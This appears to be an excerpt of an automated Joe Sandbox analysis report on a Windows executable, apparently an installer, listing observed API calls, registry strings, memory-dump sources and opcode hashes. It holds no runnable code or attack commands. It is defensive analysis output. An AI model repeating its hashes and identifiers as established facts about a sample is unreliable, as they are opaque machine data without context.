                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                  • API String ID: 47109696-1019749484
                                                                                  • Opcode ID: 3fa2b444f585c7e393a4e745fedb745ede847577bf0d6d8f1446cdfeccc58e1e
                                                                                  • Instruction ID: f187297608c4c2e120c43e334d4fef3d14aa164232434ebce48173692ca83dca
                                                                                  • Opcode Fuzzy Hash: 3fa2b444f585c7e393a4e745fedb745ede847577bf0d6d8f1446cdfeccc58e1e
                                                                                  • Instruction Fuzzy Hash: BAF089E170451467DA10A56A5C82BAE679D8B44758F20407FF608DB342D9B99D02435C
                                                                                  APIs
                                                                                  • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F72A,?,?,00000000,0046F8EE,?,_is1,?), ref: 0046F0BF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID: NoModify
                                                                                  • API String ID: 3702945584-1699962838
                                                                                  • Opcode ID: f62fff895c5cb5fcee211893b33144f563fc8351df9822a4020ec110b25f01ba
                                                                                  • Instruction ID: ad59d6647e2c6f1a966119a9b7040c47703766c51ad9b847bf72baa1670be9f7
                                                                                  • Opcode Fuzzy Hash: f62fff895c5cb5fcee211893b33144f563fc8351df9822a4020ec110b25f01ba
                                                                                  • Instruction Fuzzy Hash: 48E04FB4644304BFEB04DB95DD4AF6BB7ECDB48710F10405ABA04DB381E674FE008658
                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48
                                                                                  Strings
                                                                                  • System\CurrentControlSet\Control\Windows, xrefs: 0042DE46
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID: System\CurrentControlSet\Control\Windows
                                                                                  • API String ID: 71445658-1109719901
                                                                                  • Opcode ID: 0f77c8ce853619a5698b89c9811bea03ab3af1fee96e2778c5ec7c5c80741e7e
                                                                                  • Instruction ID: abe9ee1dba80eab6c976627f4fe301d03bda2a195c3818943ffea28d54d696bb
                                                                                  • Opcode Fuzzy Hash: 0f77c8ce853619a5698b89c9811bea03ab3af1fee96e2778c5ec7c5c80741e7e
                                                                                  • Instruction Fuzzy Hash: E7D0C7729501287BD7009A89DC41DFB775DDB15760F41441BFD1897101C1B4EC5197F8
                                                                                  APIs
                                                                                  • GetACP.KERNEL32(?,?,00000001,00000000,0047EBD7,?,-0000001A,00480A90,-00000010,?,00000004,0000001C,00000000,00480DDD,?,0045DC10), ref: 0047E96E
                                                                                    • Part of subcall function 0042E32C: GetDC.USER32(00000000), ref: 0042E33B
                                                                                    • Part of subcall function 0042E32C: EnumFontsA.GDI32(?,00000000,0042E318,00000000,00000000,0042E384,?,00000000,00000000,?,?,00000001,00000000,00000002,00000000,004817AB), ref: 0042E366
                                                                                    • Part of subcall function 0042E32C: ReleaseDC.USER32(00000000,?), ref: 0042E37E
                                                                                  • SendNotifyMessageA.USER32(00020434,00000496,00002711,-00000001), ref: 0047EB3E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                  • String ID:
                                                                                  • API String ID: 2649214853-0
                                                                                  • Opcode ID: 11d352caf6cf76a194d8beb9d25bd90a8a3644bbb7cae3402d6ea1b77134e9b7
                                                                                  • Instruction ID: ea9abfd011146b73e97573b99a0886535bf82ee2c4f6ab80840a8034e1b56658
                                                                                  • Opcode Fuzzy Hash: 11d352caf6cf76a194d8beb9d25bd90a8a3644bbb7cae3402d6ea1b77134e9b7
                                                                                  • Instruction Fuzzy Hash: 5D51BA746001008BCB10FF26D98169B7BA9EB99309B90C67BA4099F367D73CED46C79D
                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.KERNEL32(0049C420,00000000,004021FC), ref: 004020CB
                                                                                    • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                    • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049C420,0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                    • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                    • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049C420,00401A89,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                  • String ID:
                                                                                  • API String ID: 296031713-0
                                                                                  • Opcode ID: 4fc8355347e9e1d4ccec0041d5b636f63783e5cfbebeb868820e8a41b8702e1d
                                                                                  • Instruction ID: 6f01476fa854e093772c88cc0e1a6b3f7d7d3886978438045dd483ce2d71c460
                                                                                  • Opcode Fuzzy Hash: 4fc8355347e9e1d4ccec0041d5b636f63783e5cfbebeb868820e8a41b8702e1d
                                                                                  • Instruction Fuzzy Hash: FA41D3B2F403019FDB10CF68DD9522A77A4F7A9324F15417BD854A77E1D3789841CB98
                                                                                  APIs
                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DC4C
                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DCBC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 80665b2cde9ee57e522dd8711412eaf931e33ec8b5fc09fadae09ede8aa250e9
                                                                                  • Instruction ID: 688ca5bec861f28c2d3c56c4d9756a3eee1da68b680b0c58c854c6ce0276e007
                                                                                  • Opcode Fuzzy Hash: 80665b2cde9ee57e522dd8711412eaf931e33ec8b5fc09fadae09ede8aa250e9
                                                                                  • Instruction Fuzzy Hash: BA414171E00529AFDB11DF95D881BAFB7B8BF40714F90846AE800F7241D778AE40CBA9
                                                                                  APIs
                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DF7C
                                                                                  • RegCloseKey.ADVAPI32(?,0042DFED,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DFE0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseEnum
                                                                                  • String ID:
                                                                                  • API String ID: 2818636725-0
                                                                                  • Opcode ID: 26f8c79d0474c179cb5d82a07cc8f4ff1f384b49e5c41d63d2cbffb4f08ced28
                                                                                  • Instruction ID: 7da1df7d23dc80ab26fde5356f239728af9ce1fcf96cfee1e9d17441f3ac576c
                                                                                  • Opcode Fuzzy Hash: 26f8c79d0474c179cb5d82a07cc8f4ff1f384b49e5c41d63d2cbffb4f08ced28
                                                                                  • Instruction Fuzzy Hash: E0317170F04258AEDB11DFA2DD82BAEB7B9EB44304F91447BE501E7291D6785E01CA2D
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458320,00000000,00458308,?,?,?,00000000,004528D6,?,?,?,00000001), ref: 004528B0
                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00458320,00000000,00458308,?,?,?,00000000,004528D6,?,?,?,00000001), ref: 004528B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2919029540-0
                                                                                  • Opcode ID: a1edda8d9d43bdf6393d164a5935c6c7d72f205fa9b275187b219f24b5744e4f
                                                                                  • Instruction ID: f1ff12a52b9ae97e51c0fc8bedc9ee5f8128ff8695a74900dad41ba9f3169ab0
                                                                                  • Opcode Fuzzy Hash: a1edda8d9d43bdf6393d164a5935c6c7d72f205fa9b275187b219f24b5744e4f
                                                                                  • Instruction Fuzzy Hash: D1113C72604208BF8B40DEA9DD41D9F77ECEB4D310B114567FD08D3241D674AD148B68
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AE02
                                                                                  • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF5F,00000000,0040AF77,?,?,?,00000000), ref: 0040AE13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindFree
                                                                                  • String ID:
                                                                                  • API String ID: 4097029671-0
                                                                                  • Opcode ID: c2324eb5359665644a5176f1cf96553f9563edd3f7959fa6b260dc2c350a5fba
                                                                                  • Instruction ID: 0dcf9cb85912d996b0f29ff8386446a7da443b122bfb24013de7d2ae06ed8127
                                                                                  • Opcode Fuzzy Hash: c2324eb5359665644a5176f1cf96553f9563edd3f7959fa6b260dc2c350a5fba
                                                                                  • Instruction Fuzzy Hash: FB01F271300300AFDB00EFA9DC92E1A77EDEB49758B108077F500AB3D1DA39AC1096AA
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                  • EnumThreadWindows.USER32(00000000,0041EE64,00000000), ref: 0041EF09
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$CurrentEnumWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2396873506-0
                                                                                  • Opcode ID: 4f64f9abf12c4e0f4ed6bfdbad4522da757f8f173b64a0d5440e5a48dfcb49d5
                                                                                  • Instruction ID: 5ea5535e16dbd3a66c9b103d663da150a627407ba9bd10677b5e32ddf65fd45d
                                                                                  • Opcode Fuzzy Hash: 4f64f9abf12c4e0f4ed6bfdbad4522da757f8f173b64a0d5440e5a48dfcb49d5
                                                                                  • Instruction Fuzzy Hash: E9016D75A04704BFD305CF6AEC1195ABBF9E749720B22C877EC04D3690E7385820DE9A
                                                                                  APIs
                                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00452D36
                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00452D5C), ref: 00452D3E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastMove
                                                                                  • String ID:
                                                                                  • API String ID: 55378915-0
                                                                                  • Opcode ID: c4b48003847f0ed345a39601a16e4078adce9229b20c3b289e599ac23a84d65a
                                                                                  • Instruction ID: 4fca69a62489ebc4a01fefb46b4f56da8e9c918d1d9d85a0206be36eb6df5136
                                                                                  • Opcode Fuzzy Hash: c4b48003847f0ed345a39601a16e4078adce9229b20c3b289e599ac23a84d65a
                                                                                  • Instruction Fuzzy Hash: 8501D671B04208BB8710EB7A9D4149EB7FCDB8A725760457BFC04E3642EAB85E088558
                                                                                  APIs
                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00452843), ref: 0045281D
                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00452843), ref: 00452825
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1375471231-0
                                                                                  • Opcode ID: 59bd06d30fc0fe818f6078148c6ffd212d90badc892a263c44d6fa9860574bcf
                                                                                  • Instruction ID: 740ef451bc259a1e9a82c9a6d4ec6f858251f5182fd79d8d66273d0612a28aea
                                                                                  • Opcode Fuzzy Hash: 59bd06d30fc0fe818f6078148c6ffd212d90badc892a263c44d6fa9860574bcf
                                                                                  • Instruction Fuzzy Hash: E2F02871A04704BBCB00EFF5AD0159EB3E8DB4A315B1046BBFC04E3242E6B94E048698
                                                                                  APIs
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                                                  • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CursorLoad
                                                                                  • String ID:
                                                                                  • API String ID: 3238433803-0
                                                                                  • Opcode ID: f50906273b4dd4b76e2408c8e955edc8cf5c14898db3d3c1ed1d0f377b452c19
                                                                                  • Instruction ID: 8f8c17a0fbd4bdfe9a7359f041206873b2ad7c2d9544917d76f3b93295b1a640
                                                                                  • Opcode Fuzzy Hash: f50906273b4dd4b76e2408c8e955edc8cf5c14898db3d3c1ed1d0f377b452c19
                                                                                  • Instruction Fuzzy Hash: ABF0EC11704214EBDA109E7E6CC0E2A72A8DB91B36B7103BBFE3AD72D1C62E1D41427D
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLibraryLoadMode
                                                                                  • String ID:
                                                                                  • API String ID: 2987862817-0
                                                                                  • Opcode ID: 5776663e4489aa5ac087f663c1a997a3c9318ec70fb50d0ef56642908a6b2f90
                                                                                  • Instruction ID: a9e68ab2b12e17ae16f3f6d0a0ea7eea8a26f05c835edb8546f20125b23269b3
                                                                                  • Opcode Fuzzy Hash: 5776663e4489aa5ac087f663c1a997a3c9318ec70fb50d0ef56642908a6b2f90
                                                                                  • Instruction Fuzzy Hash: 47F08270B14744BFDB119F779C6282BBBECE749B1179248B6F810E3691E67D48108928
                                                                                  APIs
                                                                                  • SHGetKnownFolderPath.SHELL32(0049AD40,00008000,00000000,?), ref: 0047CD1F
                                                                                  • CoTaskMemFree.OLE32(?,0047CD62), ref: 0047CD55
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FolderFreeKnownPathTask
                                                                                  • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                  • API String ID: 969438705-544719455
                                                                                  • Opcode ID: 9e7160287d512f4d5a0f43fb802c4f91855d32992ec2e49df479a39f9ab0f4c4
                                                                                  • Instruction ID: 7f5f99bd267ec43f1d9e9eb65a142f78238518b51070f33a36bda7c886c43a5d
                                                                                  • Opcode Fuzzy Hash: 9e7160287d512f4d5a0f43fb802c4f91855d32992ec2e49df479a39f9ab0f4c4
                                                                                  • Instruction Fuzzy Hash: A8E06D31700600BEEB21DA619D92F697BA8EB48F04B61847AF504A2680D67CA900D61C
                                                                                  APIs
                                                                                  • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470341,?,00000000), ref: 00450982
                                                                                  • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470341,?,00000000), ref: 0045098A
                                                                                    • Part of subcall function 00450728: GetLastError.KERNEL32(00450544,004507EA,?,00000000,?,00498504,00000001,00000000,00000002,00000000,00498665,?,?,00000005,00000000,00498699), ref: 0045072B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 1156039329-0
                                                                                  • Opcode ID: 100ca62c34f2286d257a35485dd07fe068b79b72f0d05f198151f02be955c629
                                                                                  • Instruction ID: 93da46c6f1b31e6960e6eabd2e871c03f6a9f1a2e882d04747869ab33c8136e3
                                                                                  • Opcode Fuzzy Hash: 100ca62c34f2286d257a35485dd07fe068b79b72f0d05f198151f02be955c629
                                                                                  • Instruction Fuzzy Hash: 22E012B9305201ABF740EA7599C1F2F23DCDB48355F00986AB944CA18BD674DC054B66
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocLock
                                                                                  • String ID:
                                                                                  • API String ID: 15508794-0
                                                                                  • Opcode ID: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                                  • Instruction ID: 56019af84ea84d57b40f02c4528a45173e4f1cdf38a2be340d0d32551c2e1a06
                                                                                  • Opcode Fuzzy Hash: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                                  • Instruction Fuzzy Hash: 699002C4C01A00A4DC0072B20C0BD3F101CD8C072C3D1486F7044B6483887C88000979
                                                                                  APIs
